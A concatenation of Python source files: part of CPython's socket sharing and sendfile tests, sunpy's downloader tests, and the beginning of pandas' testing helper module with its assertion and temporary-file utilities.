# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then Windows will have
        # picked the correct value internally.  Python introspection on
        # the socket, however, will still return 0.  For the shared
        # socket, the Python value is recreated from the actual value,
        # so it may not compare equal.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
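
# Hypothetical, Windows-only sketch of the share()/fromshare() round trip
# that TestSocketSharing above exercises across two processes; here both
# ends run in the same process purely to keep the sketch self-contained.
def _demo_share_roundtrip():
    import os
    import socket
    if not hasattr(socket.socket, "share"):
        return None                      # share() only exists on Windows
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        srv.bind(("127.0.0.1", 0))
        srv.listen()
        data = srv.share(os.getpid())    # bytes blob aimed at the target pid
        clone = socket.fromshare(data)   # normally called in the other process
        try:
            return clone.getsockname() == srv.getsockname()
        finally:
            clone.close()
    finally:
        srv.close()
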
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
        # Depending on the mixin class being run, return either the
        # send()-based or the sendfile()-based implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_download.py
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#pylint: disable=W0613
import pytest
import os
import tempfile
import threading
from functools import partial
import sunpy
from sunpy.net.download import Downloader, default_name
class CalledProxy(object):
def __init__(self, fn):
self.fn = fn
self.fired = False
def __call__(self, *args, **kwargs):
self.fn(*args, **kwargs)
self.fired = True
class MockConfig(object):
def __init__(self):
self.dct = {}
def add_section(self, name, dct):
self.dct[name] = dct
def get(self, one, other):
return self.dct[one][other]
def wait_for(n, callback): #pylint: disable=W0613
items = []
def _fun(handler):
items.append(handler)
if len(items) == n:
callback(items)
return _fun
def path_fun(*args, **kwargs):
raise ValueError
def get_and_create_temp_directory(tmpdir):
sunpy.config = MockConfig()
sunpy.config.add_section(
"downloads", {"download_dir": tmpdir}
)
if not os.path.isdir(sunpy.config.get('downloads', 'download_dir')):
os.makedirs(sunpy.config.get('downloads', 'download_dir'))
return sunpy.config.get('downloads', 'download_dir')
@pytest.mark.remote_data
def test_path_exception():
x = threading.Event()
dw = Downloader(1, 2)
dw.download(
"http://google.at", path_fun, errback=wait_for(1, lambda a: x.set())
)
th = threading.Thread(target=dw.wait)
th.daemon = True
th.start()
x.wait(10)
assert x.isSet()
dw.stop()
@pytest.mark.remote_data
def test_download_http():
items = []
lck = threading.Lock()
def wait_for(n, callback): # pylint: disable=W0613
def _fun(handler):
with lck:
items.append(handler)
if len(items) == n:
callback(items)
return _fun
tmp = tempfile.mkdtemp()
path_fun = partial(default_name, tmp)
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
timer = threading.Timer(60, timeout)
timer.start()
on_finish = wait_for(3, lambda _: dw.stop())
dw.download('http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js', path_fun, on_finish)
dw.download('http://ajax.googleapis.com/ajax/libs/webfont/1.4.2/webfont.js', path_fun, on_finish)
dw.download('https://raw.githubusercontent.com/sunpy/sunpy/master/README.rst', path_fun, on_finish)
dw.wait()
timer.cancel()
assert len(items) == 3
assert not timeout.fired
for item in items:
assert os.path.exists(item['path'])
@pytest.mark.remote_data
def test_download_default_dir():
_config = sunpy.config
try:
tmpdir = tempfile.mkdtemp()
path = get_and_create_temp_directory(tmpdir)
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
errback = CalledProxy(_stop)
dw.download(
'http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js',
path=path,
callback=_stop,
errback=errback
)
timer = threading.Timer(10, timeout)
timer.start()
dw.wait()
timer.cancel()
assert not timeout.fired
assert not errback.fired
assert os.path.exists(os.path.join(tmpdir, 'jquery.min.js'))
finally:
sunpy.config = _config
@pytest.mark.remote_data
def test_download_dir():
tmpdir = tempfile.mkdtemp()
dw = Downloader(1, 1)
_stop = lambda _: dw.stop()
timeout = CalledProxy(dw.stop)
errback = CalledProxy(_stop)
dw.download(
'http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js',
tmpdir,
callback=_stop,
errback=errback
)
timer = threading.Timer(10, timeout)
timer.start()
dw.wait()
timer.cancel()
assert not timeout.fired
assert not errback.fired
assert os.path.exists(os.path.join(tmpdir, 'jquery.min.js'))
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
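# Usage sketch for round_trip_pickle (illustrative helper, not called anywhere):
# a small DataFrame is pickled to a temporary path via ensure_clean and re-read.
def _example_round_trip_pickle():
    df = DataFrame({"a": [1, 2, 3]})
    result = round_trip_pickle(df)   # write + read back from a temp pickle file
    assert_frame_equal(result, df)   # the round trip preserves the frame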
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
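# Usage sketch for the path-based round-trip helpers (illustrative, not called):
# writer is a bound IO method and reader a module-level function; both receive
# the constructed Path / LocalPath object.
def _example_round_trip_pathlib():
    df = DataFrame({"a": [1, 2, 3]})
    result = round_trip_pathlib(df.to_pickle, pd.read_pickle)
    assert_frame_equal(result, df)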
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
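# Usage sketch for decompress_file (illustrative; "data.csv.gz" is a placeholder
# path assumed to exist): the yielded handle is binary and closed on exit.
def _example_decompress_file(path="data.csv.gz"):
    with decompress_file(path, compression="gzip") as fh:
        return fh.read()   # raw bytes of the decompressed payload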
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
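# Usage sketch combining write_to_compressed with decompress_file (illustrative,
# not called anywhere); the temporary path is managed by ensure_clean.
def _example_write_to_compressed():
    payload = b"col\n1\n2\n"
    with ensure_clean("__payload__.bz2") as path:
        write_to_compressed("bz2", path, payload)
        with decompress_file(path, compression="bz2") as fh:
            assert fh.read() == payload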
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
    >>> _get_tol_from_less_precise(False)
    5e-06
    >>> _get_tol_from_less_precise(True)
    0.0005
    >>> # Using check_less_precise as an int representing the decimal
    >>> # tolerance intended:
    >>> _get_tol_from_less_precise(2)
    0.005
    >>> _get_tol_from_less_precise(8)
    5e-09
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
        # Equivalent to setting check_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
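# Usage sketch for assert_almost_equal (illustrative, not called anywhere): a
# perturbation well below the default rtol/atol passes; Series input dispatches
# to assert_series_equal with check_exact=False.
def _example_assert_almost_equal():
    left = Series([1.0, 2.0, 3.0])
    right = left + 1e-9
    assert_almost_equal(left, right)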
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
    Get a temporary file path (or file-like object) and remove it on exit.
Parameters
----------
filename : str (optional)
        If None, creates a temporary file which is then removed when out of
        scope. If passed, creates a temporary file with the given filename as its suffix.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
    Get a temporary directory path and remove it on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
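# Usage sketch for ensure_safe_environment_variables (illustrative, not called);
# "PANDAS_DEMO_FLAG" is a hypothetical variable name used only for the example.
def _example_ensure_safe_environment_variables():
    before = dict(os.environ)
    with ensure_safe_environment_variables():
        os.environ["PANDAS_DEMO_FLAG"] = "1"   # change is visible inside the block
    assert dict(os.environ) == before          # and rolled back on exit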
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
